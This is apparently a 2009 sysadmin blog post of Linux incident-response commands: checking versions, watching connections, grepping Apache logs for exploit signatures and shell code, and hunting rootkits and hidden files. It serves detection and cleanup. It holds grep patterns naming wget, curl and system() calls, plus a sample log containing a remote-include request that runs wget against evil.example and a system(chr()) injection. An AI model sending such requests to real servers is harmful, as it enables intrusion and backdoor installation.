December 19, 2009

Other commands: version, virus scan, etc.

What version of Linux is running

root:~#cat /etc/redhat-release

or, for non-Red Hat Linux:

root:~#cat /etc/issue


Compare this to the running kernel:

root:~#uname -a

and

root:~#cat /proc/version

Who is the author of the file:

root:~#ls -la --author


When was the file last accessed, and by whom:

root:~#ls -l --time=access

Before you run off and use the cat command it is good to first check the file type with the file command. Many a time I myself have been fooled seeing a file marked as something.html and finding it was really a binary file.


What kind of file is it:

root:~#file filename

or

root:~#file /path/to/directory/*


Real Time Network Activity Examples:

root:~#watch -d 'netstat -nalp |grep -v DGRAM |grep -v STREAM |grep -v LISTEN'
root:~#watch 'netstat -nalp |grep ":TCP PORT Number"'
root:~#watch 'netstat -nalp |grep ":22"'

Update the Locate Database:

root:~#updatedb &

Search for Apache Exploit

for i in `locate access_log` ; do echo "$i" ; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$i" ; done

or

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*


cPanel
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*


Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*


Plesk
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*

Of course, not everything it locates is an exploit; it takes some interpreting. You are looking for obvious things such as a call to wget to download a file, or a call to perl that looks strangely out of place. However, one thing this search does not look for is shell code. Once you locate the access logs, run a second search for long strings containing /x90/. I have yet to find a good interpreter of what these shell codes do, but again google.com is your friend. Most often you can search for the code itself and come up with a technical explanation of what the code does.


Search for Shell Code:
grep "/x90/" /path/to/access/logs/*
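As an added example (not part of the original post), the same access_log signature wrapped in a small shell script: it builds a constructed sample log, reports only the suspicious lines prefixed with file name and line number, and returns a hit count you can check. The IP, host names and requests in the sample are made up.

```shell
#!/bin/sh
# Added example, not from the original post: run the post's access_log
# signature over a constructed sample log and report only suspicious lines.

# The same pattern the post greps for: PHP chr()/system() helpers and
# URL-encoded (%20) calls to download/compile tools.
SIG='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'

# Constructed sample log in combined log format; the first two lines are
# benign, the last two are the kind of request the signature is meant to catch.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [19/Dec/2009:10:01:02 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Dec/2009:10:01:05 -0500] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
12.34.56.78 - - [19/Dec/2009:10:02:11 -0500] "GET /gallery.php?id=http://evil.example/c.txt?&cmd=wget%20http://evil.example/bd HTTP/1.1" 200 33 "-" "libwww-perl/5.8"
12.34.56.78 - - [19/Dec/2009:10:02:15 -0500] "GET /view.php?page=;system(chr(105).chr(100)); HTTP/1.1" 500 0 "-" "libwww-perl/5.8"
EOF
}

# Print matching lines as file:lineno:line (-H forces the file name even
# for a single file); exit status is 0 when at least one line matched.
scan_access_log() {
    grep -EinH -- "$SIG" "$1"
}

# Number of suspicious lines in a file, as a bare integer.
count_hits() {
    scan_access_log "$1" | wc -l | tr -d ' '
}

# Stand-alone run against a temporary constructed log.
LOG=$(mktemp)
make_sample_log "$LOG"
scan_access_log "$LOG"
echo "suspicious lines: $(count_hits "$LOG")"
rm -f "$LOG"
```

Point scan_access_log at a real access_log (or loop it over the cPanel, Ensim or Plesk paths above) to get the same file:line-prefixed output.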

Finally, now you can run your favorite virus scanner and rootkit hunter. Some favorites include rkhunter and chkrootkit.


ChkRootkit
http://www.chkrootkit.org


RKHunter
http://www.rootkit.nl

Hopefully by now the updatedb has finished; you can check its status with the jobs command. Look for things that are out of place and don't belong: are there .bash_history or access_log files that seem to be in the wrong area? This is where you try to think like a hacker and look for the strange things that just don't seem right.


Think Like a Hacker in Your Search

root:~#locate .bash_history
root:~#locate access_log
root:~#locate "..."
root:~#locate ".. "
root:~#locate " .."
root:~#locate ". "
root:~#locate " ."

Who Owns the IP Address

root:~#whois 12.34.56.78

Gather all Data About the IP Address

root:~#for i in `ls -la /var/log |grep -v drwx |grep -v lrwx | awk '{print $9}'`; do echo /var/log/$i; grep "12.34.56.78" /var/log/$i ; done
